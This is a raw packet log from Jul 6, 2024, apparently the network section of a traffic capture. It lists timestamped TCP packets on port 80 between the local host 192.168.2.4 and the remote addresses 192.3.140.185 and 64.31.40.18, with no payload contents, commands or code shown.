Jul 6, 2024 13:27:16.183177948 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.183214903 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.184494972 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184510946 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184523106 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184539080 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184549093 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.184551001 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184564114 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184573889 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184580088 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184586048 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.184588909 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184612036 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184622049 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.184626102 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184638977 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184643984 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.184652090 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184655905 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.184667110 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184678078 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.184679985 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184693098 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184704065 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.184705019 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184716940 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184731960 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184741020 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.184745073 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184758902 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184768915 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.184771061 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184781075 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.184784889 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184798956 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.184809923 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.184843063 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.185086012 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.185098886 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.185108900 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.185122967 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.185133934 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.185133934 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.185146093 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.185158968 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.185169935 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.185193062 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.185224056 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.185224056 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.192050934 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.319597960 CEST	49742	80	192.168.2.4	64.31.40.18
Jul 6, 2024 13:27:16.324625015 CEST	80	49742	64.31.40.18	192.168.2.4
Jul 6, 2024 13:27:16.324723959 CEST	49742	80	192.168.2.4	64.31.40.18
Jul 6, 2024 13:27:16.324762106 CEST	49742	80	192.168.2.4	64.31.40.18
Jul 6, 2024 13:27:16.329627991 CEST	80	49742	64.31.40.18	192.168.2.4
Jul 6, 2024 13:27:16.847731113 CEST	80	49742	64.31.40.18	192.168.2.4
Jul 6, 2024 13:27:16.847767115 CEST	80	49742	64.31.40.18	192.168.2.4
Jul 6, 2024 13:27:16.848021030 CEST	49742	80	192.168.2.4	64.31.40.18
Jul 6, 2024 13:27:16.848303080 CEST	49742	80	192.168.2.4	64.31.40.18
Jul 6, 2024 13:27:16.848783970 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.853924990 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:16.854029894 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.854095936 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:16.859041929 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.451699972 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.451745987 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.451762915 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.451801062 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.451812983 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.451824903 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.451837063 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.451838017 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.451848030 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.451889038 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.451889038 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.451929092 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.451960087 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.451982021 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.452389002 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.456692934 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.456742048 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.456760883 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.457016945 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.542804003 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.542817116 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.542823076 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.542880058 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.542897940 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.542911053 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.542923927 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.542942047 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.542979956 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.543165922 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.543230057 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.543241978 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.543277979 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.543340921 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.543353081 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.543390036 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.543401957 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.543447971 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.544171095 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.544215918 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.544229031 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.544266939 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.544307947 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.544320107 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.544333935 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.544348001 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.544384003 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.545135975 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.545191050 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.545202971 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.545238972 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.545264006 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.545277119 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.545317888 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.547682047 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.547925949 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.634042025 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634110928 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634121895 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634156942 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.634175062 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634187937 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634222031 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.634291887 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634303093 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634314060 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634325027 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634337902 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634341955 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.634352922 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.634388924 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.634428024 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634485006 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634495974 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634531975 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.634633064 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634644032 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634654045 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634666920 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634684086 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.634695053 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.634820938 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634829998 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634840965 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634852886 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.634865046 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.634897947 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.635334969 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.635375023 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.635381937 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.635399103 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.635437965 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.635523081 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.635536909 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.635548115 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.635588884 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.635615110 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.635627031 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.635663033 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.635699034 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.635710955 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.635721922 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.635747910 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.635780096 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.636301041 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.636354923 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.636374950 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.636385918 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.636401892 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.636432886 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.636501074 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.636512041 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.636529922 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.636559010 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.636621952 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.636632919 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.636663914 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.636723042 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.636734009 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.636773109 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.637206078 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.637340069 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.680453062 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.680479050 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.680496931 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.680551052 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.725027084 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725039959 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725050926 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725090981 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.725179911 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725230932 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725241899 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725277901 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.725303888 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725315094 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725323915 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725352049 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.725832939 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725843906 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725855112 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725866079 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725878000 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725887060 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.725889921 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725902081 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725913048 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725918055 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.725924969 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725941896 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.725972891 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725975990 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.725984097 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.725992918 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726011038 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726018906 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.726023912 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726033926 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726046085 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726047039 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.726072073 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.726321936 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726434946 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726452112 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726484060 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.726494074 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726507902 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726511002 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.726546049 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.726630926 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726644993 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726655960 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726667881 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726681948 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.726685047 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726707935 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.726828098 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726840019 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726866961 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.726939917 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726950884 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726963043 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.726985931 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.726998091 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.727246046 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.727267027 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.727278948 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.727320910 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.727406979 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.727418900 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.727428913 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.727440119 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.727458000 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.727472067 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.728323936 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.728337049 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.728346109 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.728358030 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.728374004 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.728384018 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.728388071 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.728406906 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.728423119 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.730036974 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.730057001 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.730109930 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.730110884 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.730122089 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.730133057 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.730150938 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.730180025 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.730526924 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.771658897 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.771768093 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.771780968 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.771792889 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.771805048 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.771820068 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.771863937 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.815953016 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.815965891 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.815983057 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.815996885 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.816008091 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.816023111 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:17.817907095 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.832767010 CEST	49745	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:17.837606907 CEST	80	49745	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.004398108 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.009378910 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.009458065 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.009499073 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.014329910 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.630492926 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.630513906 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.630523920 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.630542994 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.630567074 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.630604982 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.630759001 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.630779982 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.630841017 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.630841970 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.630865097 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.630916119 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.630945921 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.630958080 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.631042957 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.635445118 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.635498047 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.635555983 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.635566950 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.635605097 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.719403028 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.719415903 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.719428062 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.719455004 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.719540119 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.719552994 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.719564915 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.719584942 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.719619036 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.719824076 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.719922066 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.719932079 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.719963074 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.719985008 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.720001936 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.720015049 CEST	80	49747	192.3.140.185	192.168.2.4
